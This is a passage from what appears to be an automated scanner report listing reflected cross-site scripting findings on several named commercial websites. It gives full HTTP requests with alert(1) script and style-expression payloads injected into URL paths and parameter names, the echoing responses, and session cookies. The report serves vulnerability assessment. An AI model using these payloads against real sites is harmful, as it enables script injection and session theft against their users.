GET /common/global_flash/player9f00a<script>alert(1)</script>23a7a268b9f/player.php HTTP/1.1 Host: www.csssports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=80897029.1292783235.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=6b05ec11a461d9a8387664878226f26a; __utma=80897029.607252618.1292783235.1292783235.1292783235.1; __utmc=80897029; __utmb=80897029;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:24 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:24 GMT Content-Length: 789 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/global_flash/player9f00a<script>alert(1)</script>23a7a268b9f/player.php"</strong> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4dfaf<script>alert(1)</script>d0647911e58 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/global_flash/player/player.php4dfaf<script>alert(1)</script>d0647911e58 HTTP/1.1 Host: www.csssports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=80897029.1292783235.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=6b05ec11a461d9a8387664878226f26a; __utma=80897029.607252618.1292783235.1292783235.1292783235.1; __utmc=80897029; __utmb=80897029;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:25 GMT Content-Length: 789 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/global_flash/player/player.php4dfaf<script>alert(1)</script>d0647911e58"</strong> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6d0e3<script>alert(1)</script>2dd732714b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/js/6d0e3<script>alert(1)</script>2dd732714b0 HTTP/1.1 Host: www.csssports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=80897029.1292783235.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=6b05ec11a461d9a8387664878226f26a; __utma=80897029.607252618.1292783235.1292783235.1292783235.1; __utmc=80897029; __utmb=80897029;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:21 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:21 GMT Content-Length: 762 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/js/6d0e3<script>alert(1)</script>2dd732714b0"</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 200d1<script>alert(1)</script>8d9a9f99de5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages200d1<script>alert(1)</script>8d9a9f99de5/landing/ HTTP/1.1 Host: www.csssports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=80897029.1292783235.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=6b05ec11a461d9a8387664878226f26a; __utma=80897029.607252618.1292783235.1292783235.1292783235.1; __utmc=80897029; __utmb=80897029;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:27 GMT Content-Length: 766 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/pages200d1<script>alert(1)</script>8d9a9f99de5/landing/"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 14140<script>alert(1)</script>998c32cd570 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /pages/landing14140<script>alert(1)</script>998c32cd570/ HTTP/1.1 Host: www.csssports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=80897029.1292783235.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=6b05ec11a461d9a8387664878226f26a; __utma=80897029.607252618.1292783235.1292783235.1292783235.1; __utmc=80897029; __utmb=80897029;
Response (redirected)
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:27 GMT Content-Length: 785 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/404.html?p=/pages/landing14140<script>alert(1)</script>998c32cd570/"</strong> ...[SNIP]...
2.433. http://www.csssports.com/pages/landing/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.csssports.com
Path:
/pages/landing/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6dbf"><script>alert(1)</script>3e8dff6d570 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages/landing/?c6dbf"><script>alert(1)</script>3e8dff6d570=1 HTTP/1.1 Host: www.csssports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=80897029.1292783235.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=6b05ec11a461d9a8387664878226f26a; __utma=80897029.607252618.1292783235.1292783235.1292783235.1; __utmc=80897029; __utmb=80897029;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:26 GMT Content-Length: 21247 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <!-- web1.platformic.com --> <meta http-equiv="Content-Type" content="t ...[SNIP]... <input type=hidden name="c6dbf"><script>alert(1)</script>3e8dff6d570" id = "c6dbf"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 50f5a<script>alert(1)</script>bb6623216d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages50f5a<script>alert(1)</script>bb6623216d6/landing_09 HTTP/1.1 Host: www.csssports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=80897029.1292783235.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=6b05ec11a461d9a8387664878226f26a; __utma=80897029.607252618.1292783235.1292783235.1292783235.1; __utmc=80897029; __utmb=80897029;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:27 GMT Content-Length: 768 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/pages50f5a<script>alert(1)</script>bb6623216d6/landing_09"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 28777<script>alert(1)</script>8208de7ceaf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /pages/landing_0928777<script>alert(1)</script>8208de7ceaf HTTP/1.1 Host: www.csssports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=80897029.1292783235.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=6b05ec11a461d9a8387664878226f26a; __utma=80897029.607252618.1292783235.1292783235.1292783235.1; __utmc=80897029; __utmb=80897029;
Response (redirected)
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:28 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:28 GMT Content-Length: 787 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/404.html?p=/pages/landing_0928777<script>alert(1)</script>8208de7ceaf"</strong> ...[SNIP]...
2.436. http://www.csssports.com/pages/landing_09 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.csssports.com
Path:
/pages/landing_09
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e731c"><script>alert(1)</script>d0ae0c06224 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages/landing_09?e731c"><script>alert(1)</script>d0ae0c06224=1 HTTP/1.1 Host: www.csssports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=80897029.1292783235.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=6b05ec11a461d9a8387664878226f26a; __utma=80897029.607252618.1292783235.1292783235.1292783235.1; __utmc=80897029; __utmb=80897029;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:26 GMT Content-Length: 17329 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <!-- web1.platformic.com --> <meta http-equiv="Content-Type" content="t ...[SNIP]... <input type=hidden name="e731c"><script>alert(1)</script>d0ae0c06224" id = "e731c"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f26e6<script>alert(1)</script>c22b761abcc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pagesf26e6<script>alert(1)</script>c22b761abcc/main HTTP/1.1 Host: www.csssports.com Proxy-Connection: keep-alive Referer: http://www.csssports.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: Apache Vary: Accept-Encoding Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:52 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:52 GMT Connection: close Content-Length: 762
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/pagesf26e6<script>alert(1)</script>c22b761abcc/main"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7b185<script>alert(1)</script>ae0caafdbfb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /pages/main7b185<script>alert(1)</script>ae0caafdbfb HTTP/1.1 Host: www.csssports.com Proxy-Connection: keep-alive Referer: http://www.csssports.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 404 Not Found Server: Apache Vary: Accept-Encoding Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:53 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:53 GMT Connection: close Content-Length: 781
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/404.html?p=/pages/main7b185<script>alert(1)</script>ae0caafdbfb"</strong> ...[SNIP]...
2.439. http://www.csssports.com/pages/main [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.csssports.com
Path:
/pages/main
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4c96"><script>alert(1)</script>c61d9f91efb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages/main?d4c96"><script>alert(1)</script>c61d9f91efb=1 HTTP/1.1 Host: www.csssports.com Proxy-Connection: keep-alive Referer: http://www.csssports.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:52 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:52 GMT Connection: close Set-Cookie: PHPSESSID=e615b2bf36e09ec6d8014f4ea927fd3f; path=/ Content-Length: 33905
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <!-- web2.platformic.com --> <meta http-equiv="Content-Type" content="t ...[SNIP]... <input type=hidden name="d4c96"><script>alert(1)</script>c61d9f91efb" id = "d4c96"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3051"><script>alert(1)</script>47ff100c80b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /atlanta/article/94262/5-Gifts-for-Homebodiesc3051"><script>alert(1)</script>47ff100c80b HTTP/1.1 Host: www.dailycandy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8FFCD6C19132F3BA5ADEB2B3FBED3604; s_pers=%20gpv_p1%3Dall%2520cities%7C1292785081959%3B%20s_depth%3D1%7C1292785081962%3B%20sspp%3D1292783281972%7C1292785081972%3B%20gpv_p4%3Dhome%7C1292785081978%3B%20gpv_url%3D/all-cities/%7C1292785081981%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%2016pv%3D1%3B%20s_sq%3D%3B; __utmz=38675254.1292783282.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26872763051D1B17-4000010740006451[CE]; SaneID=174.121.222.18-1292783289689; __utma=38675254.1141008645.1292783282.1292783282.1292783282.1; __utmc=38675254; __utmb=38675254.1.10.1292783282;
Response
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding,User-Agent Content-Type: text/html;charset=utf-8 Date: Sun, 19 Dec 2010 18:33:51 GMT Keep-Alive: timeout=15, max=62 Content-Language: en-US Connection: close Content-Length: 37822
<!DOCTYPE html> <html lang="en" id="dailycandy-com"> <head> <title>5 Gifts for Homebodies | Atlanta - DailyCandy </title>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59667"><script>alert(1)</script>ea3e5fd6674 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /dallas/article/94178/Artsy-Gifts-Shopping-at-Nest59667"><script>alert(1)</script>ea3e5fd6674 HTTP/1.1 Host: www.dailycandy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8FFCD6C19132F3BA5ADEB2B3FBED3604; s_pers=%20gpv_p1%3Dall%2520cities%7C1292785081959%3B%20s_depth%3D1%7C1292785081962%3B%20sspp%3D1292783281972%7C1292785081972%3B%20gpv_p4%3Dhome%7C1292785081978%3B%20gpv_url%3D/all-cities/%7C1292785081981%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%2016pv%3D1%3B%20s_sq%3D%3B; __utmz=38675254.1292783282.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26872763051D1B17-4000010740006451[CE]; SaneID=174.121.222.18-1292783289689; __utma=38675254.1141008645.1292783282.1292783282.1292783282.1; __utmc=38675254; __utmb=38675254.1.10.1292783282;
Response
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding,User-Agent Content-Type: text/html;charset=utf-8 Date: Sun, 19 Dec 2010 18:33:55 GMT Keep-Alive: timeout=15, max=73 Content-Language: en-US Connection: close Content-Length: 37655
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c262"><script>alert(1)</script>1279e8ec1e6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /los-angeles/article/94180/Los-Angeles-Events-and-Diversions8c262"><script>alert(1)</script>1279e8ec1e6 HTTP/1.1 Host: www.dailycandy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8FFCD6C19132F3BA5ADEB2B3FBED3604; s_pers=%20gpv_p1%3Dall%2520cities%7C1292785081959%3B%20s_depth%3D1%7C1292785081962%3B%20sspp%3D1292783281972%7C1292785081972%3B%20gpv_p4%3Dhome%7C1292785081978%3B%20gpv_url%3D/all-cities/%7C1292785081981%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%2016pv%3D1%3B%20s_sq%3D%3B; __utmz=38675254.1292783282.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26872763051D1B17-4000010740006451[CE]; SaneID=174.121.222.18-1292783289689; __utma=38675254.1141008645.1292783282.1292783282.1292783282.1; __utmc=38675254; __utmb=38675254.1.10.1292783282;
Response
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding,User-Agent Content-Type: text/html;charset=utf-8 Date: Sun, 19 Dec 2010 18:33:55 GMT Keep-Alive: timeout=15, max=77 Content-Language: en-US Connection: close Content-Length: 41126
<!DOCTYPE html> <html lang="en" id="dailycandy-com"> <head> <title>Los Angeles Events and Diversions | Los Angeles - DailyCandy </title>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13dfc"><script>alert(1)</script>d1a68770457 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /new-york/article/94172/Custom-Family-Crests13dfc"><script>alert(1)</script>d1a68770457 HTTP/1.1 Host: www.dailycandy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8FFCD6C19132F3BA5ADEB2B3FBED3604; s_pers=%20gpv_p1%3Dall%2520cities%7C1292785081959%3B%20s_depth%3D1%7C1292785081962%3B%20sspp%3D1292783281972%7C1292785081972%3B%20gpv_p4%3Dhome%7C1292785081978%3B%20gpv_url%3D/all-cities/%7C1292785081981%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%2016pv%3D1%3B%20s_sq%3D%3B; __utmz=38675254.1292783282.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26872763051D1B17-4000010740006451[CE]; SaneID=174.121.222.18-1292783289689; __utma=38675254.1141008645.1292783282.1292783282.1292783282.1; __utmc=38675254; __utmb=38675254.1.10.1292783282;
Response
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding,User-Agent Content-Type: text/html;charset=utf-8 Date: Sun, 19 Dec 2010 18:34:00 GMT Keep-Alive: timeout=15, max=55 Content-Language: en-US Connection: close Content-Length: 36873
<!DOCTYPE html> <html lang="en" id="dailycandy-com"> <head> <title>Custom Family Crests | New York - DailyCandy </title>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1e19"><script>alert(1)</script>57d48670345 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /washington-dc/article/94234/5-Gifts-for-Art-Fanaticse1e19"><script>alert(1)</script>57d48670345 HTTP/1.1 Host: www.dailycandy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8FFCD6C19132F3BA5ADEB2B3FBED3604; s_pers=%20gpv_p1%3Dall%2520cities%7C1292785081959%3B%20s_depth%3D1%7C1292785081962%3B%20sspp%3D1292783281972%7C1292785081972%3B%20gpv_p4%3Dhome%7C1292785081978%3B%20gpv_url%3D/all-cities/%7C1292785081981%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%2016pv%3D1%3B%20s_sq%3D%3B; __utmz=38675254.1292783282.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26872763051D1B17-4000010740006451[CE]; SaneID=174.121.222.18-1292783289689; __utma=38675254.1141008645.1292783282.1292783282.1292783282.1; __utmc=38675254; __utmb=38675254.1.10.1292783282;
Response
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding,User-Agent Content-Type: text/html;charset=utf-8 Date: Sun, 19 Dec 2010 18:34:16 GMT Keep-Alive: timeout=15, max=1 Content-Language: en-US Connection: close Content-Length: 41608
<!DOCTYPE html> <html lang="en" id="dailycandy-com"> <head> <title>5 Gifts for Art Fanatics | Washington, D.C. - DailyCandy </title>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dc254'style%3d'x%3aexpression(alert(1))'5f1cb0a4076 was submitted in the REST URL parameter 2. This input was echoed as dc254'style='x:expression(alert(1))'5f1cb0a4076 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /workout-videos/alldc254'style%3d'x%3aexpression(alert(1))'5f1cb0a4076/ HTTP/1.1 Host: www.exercisetv.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=172502007.1292783303.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; __utma=172502007.1681628549.1292783303.1292783303.1292783303.1; __utmc=172502007; __qca=P0-544985607-1292783303522; __utmb=172502007.1.10.1292783303; ASP.NET_SessionId=t2obdpzj4e3ipnmm5bcxtg45;
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 19 Dec 2010 18:35:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 205917 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><meta http-equiv="Conten ...[SNIP]... <a class='lstLnk' href='http://www.exercisetv.tv:80/workout-videos/alldc254'style='x:expression(alert(1))'5f1cb0a4076/?page=172'> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe8ad"><script>alert(1)</script>b2edcdf1fe7 was submitted in the REST URL parameter 3. This input was echoed as fe8ad\"><script>alert(1)</script>b2edcdf1fe7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/2010/tuned-in-what-to-watch-todayfe8ad"><script>alert(1)</script>b2edcdf1fe7/what-to-watch-weekend-31/ HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:12:16 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:17:16 GMT Content-Length: 39571
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aac6b</script><script>alert(1)</script>eec3ce1ded8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
